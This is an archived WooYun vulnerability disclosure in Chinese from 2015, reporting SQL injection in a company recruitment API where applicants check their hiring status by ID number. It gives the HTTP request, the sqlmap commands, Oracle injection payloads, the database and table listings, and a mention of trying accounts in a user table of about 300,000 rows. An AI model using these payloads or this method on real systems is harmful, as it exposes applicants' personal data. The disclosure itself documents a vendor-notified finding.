乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-28: 细节已通知厂商并且等待厂商处理中 2015-01-30: 厂商已经确认,细节仅向厂商公开 2015-02-09: 细节向核心白帽子及相关领域专家公开 2015-02-19: 细节向普通白帽子公开 2015-03-01: 细节向实习白帽子公开 2015-03-14: 细节向公众公开
安全是一个整体
在微信上看自己的简历被录取了没有,输入身份证号码进行查询,结果发现该接口存在SQL注入:
http://zte.pro.bama555.com/api/
出现问题的地方:
POST /api/index.php HTTP/1.1Content-Length: 69Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://zte.pro.bama555.com:80/api/Host: zte.pro.bama555.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*code=-1&dopost=status
code参数存在问题。
sqlmap.py -r ../sql.txt -p "code" --dbs
sqlmap identified the following injection points with a total of 554 HTTP(s) requests:---Place: POSTParameter: code Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: code=-1' AND 6063=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(111)||CHR(112)||CHR(115)||CHR(113)||(SELECT (CASE WHEN (6063=6063) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(114)||CHR(119)||CHR(99)||CHR(113)||CHR(62))) FROM DUAL) AND 'donS'='donS&dopost=status Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: code=-1' AND 5729=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'yerm'='yerm&dopost=status---back-end DBMS: Oracleavailable databases [19]:[*] ASSE[*] CAREER[*] CTXSYS[*] HNCAREER[*] HOLONLINE[*] HRONLINE[*] INTERNCAREER[*] LHC[*] MDSYS[*] ORDSYS[*] OUTLN[*] PERFSTAT[*] SYS[*] SYSTEM[*] TIVOLI[*] WMSYS[*] XDB[*] ZHAOPIN[*] ZTECAREER
ZHAOPIN库中有138张表:
sqlmap.py -r ../sql.txt -p "code" -D ZHAOPIN --tables
Database: ZHAOPIN[138 tables]+--------------------------------+| ATM_MAIL_DATA || BASE_DICTIONARIES || BASE_HELP_CONFIG || CAREER_APPROVE_DETAIL || CAREER_AUDIT_RESUME || CAREER_COMPANY_DIC || CAREER_COMPRE_RECORD || CAREER_COMPRE_VIEW || CAREER_CONFIGURATION || CAREER_DEPARTMENT || CAREER_DIC_DATA || CAREER_DIC_MAPPING || CAREER_DIC_TYPE || CAREER_ERROR_LOG || CAREER_EXAMINER_COM || CAREER_EXAMINER_DETAIL_COM || CAREER_EXAMINER_DETAIL_PRO || CAREER_EXAMINER_PRO || CAREER_EXAM_INVITE || CAREER_EXAM_RECORD || CAREER_FAQ || CAREER_FINAL_ALLOCATE || CAREER_FINAL_RECORD || CAREER_FINAL_VIEW || CAREER_INFOMATION || CAREER_INFO_TYPE || CAREER_INVESTIGATE || CAREER_JOB_INFO || CAREER_JOB_REPLY || CAREER_JOB_TYPE || CAREER_LOGIN_LOG || CAREER_MENU_INFO || CAREER_MESSAGE_TOME || CAREER_OPRERATE_DATA_LOG || CAREER_OPRERATE_LOG || CAREER_OVERSEA_USER_INFO || CAREER_POSITION_UPLOAD_TASK || CAREER_PRIEXAM_RECORD || CAREER_PRO_RECORD || CAREER_PRO_VIEW || CAREER_QUERY_PLATFORM || CAREER_QUERY_STAT || CAREER_RECORD_TOTAL || CAREER_REQUIREMENT_INFO || CAREER_REQUIREMENT_LOG || CAREER_REQUIREMENT_MID || CAREER_REQUIREMENT_PROCESSOR || CAREER_REQUIREMENT_PROCES_STAT || CAREER_REQUIREMENT_RELATION || CAREER_RESUME_ALL || CAREER_RESUME_INDEX || CAREER_RESUME_JOIN_CONFIG || CAREER_RESUME_OP_LOG || CAREER_RESUME_QUERY_LOG || CAREER_ROLE_DEFINE || CAREER_ROLE_MEMBER || CAREER_ROLE_MEMBER_DEPT || CAREER_ROLE_PERMIT || CAREER_SMS || CAREER_STATUS_MAPPING || CAREER_STATUS_UPDATE_DIC || CAREER_UNIAPPROVE_TS || CAREER_UPLOAD_FILE_INFO || CAREER_USER_ACCOUNT || CAREER_USER_EDUCATION || CAREER_USER_EXPERIENCE || CAREER_USER_INFO || CAREER_USER_LANGUAGE_INFO || COMMUNICATE_RECORD || DR$COMU_RECORD_INDEX$I || DR$COMU_RECORD_INDEX$K || DR$COMU_RECORD_INDEX$N || DR$COMU_RECORD_INDEX$R || DR$QUICK_SEARCH$I || DR$QUICK_SEARCH$K || DR$QUICK_SEARCH$N || DR$QUICK_SEARCH$R || EMP_PROJECT_RELARION || GRD_CHARACTER_STAR_DIC || GRD_CHARACTER_YANSHI_DIC || GRD_CHATEST_ATR_DIC || GRD_CHATEST_CON_RESULT || GRD_CHATEST_ITEM_DIC || GRD_CHATEST_ITEM_RESULT || GRD_CHATEST_SJ || GRD_CHATEST_SJTYPE || GRD_CHATEST_SJ_POSI || GRD_CHATEST_TYPE_DIC || GRD_CHATEST_TYPE_RESULT || HRT_ERROR_LOG || HRT_MAIL_CONFIG || HRT_MANAGER_DEPT || HRT_RESUME_TEMP || HRT_WFSERIAL || HR_EXCEL_IMPORT_TMP || HR_LANG_EMP_TEST || JOB_DICTIONARY || JOB_DIC_RELATION || MENU_TRANSLATE || MLOG$_CAREER_USER_INFO || PLAN_TABLE || PLATFORM_EMPLOYEE_RELATION || PLATFORM_LANG_WORKPLACE || RECOMMEND_PROCESS_MANAGE || RECOMMEND_RESUME || RECOMMEND_RESUME_TMP || RESUME_RECOMMENT_BONUS || RESUME_STATUS_RELATION || TALENT_LIBRARY_RESUME || TALENT_LIBRARY_RESUME_TMP || TALENT_RESUME_ALL || TEMP_1 || TEMP_XXL || TMP_CAREER_USER_EXP_HUAWEI || WFT_GIVERIGHT || WFT_GIVERIGHT_LOG || WFT_HANDLER_DIC || WFT_ROLES_OPERATION_DEFINE || WFT_TEMPLATE || WFT_TEMPLATE_DEFINE || WFT_TEMPLATE_ENDWFEMP || WFT_TEMPLATE_ENDWFEMP_BACK || WFT_TEMPLATE_EXAM_PAGE || WFT_TEMPLATE_GRAPHICS || WFT_TEMPLATE_LINK || WFT_TEMPLATE_LOG || WFT_TEMPLATE_NODE || WFT_TEMPLATE_PARAM || WFT_THREAD_ABOUTPERSON || WFT_THREAD_ACL || WFT_THREAD_ENDSTATUS_DIC || WFT_THREAD_HANDLE_TRACE || WFT_THREAD_HEAD || WFT_THREAD_LOG || WFT_THREAD_PARAM || WFT_THREAD_REC || WFT_THREAD_STATUS_DIC || WFT_TWOLEVEL_HANDLER |+--------------------------------+
看一看CAREER_USER_ACCOUNT表:
30来万数据,跑了几个试了一下没跑了:
其他表里面的信息就不深入去看了。
危害等级:高
漏洞Rank:20
确认时间:2015-01-30 08:59
感谢~
暂无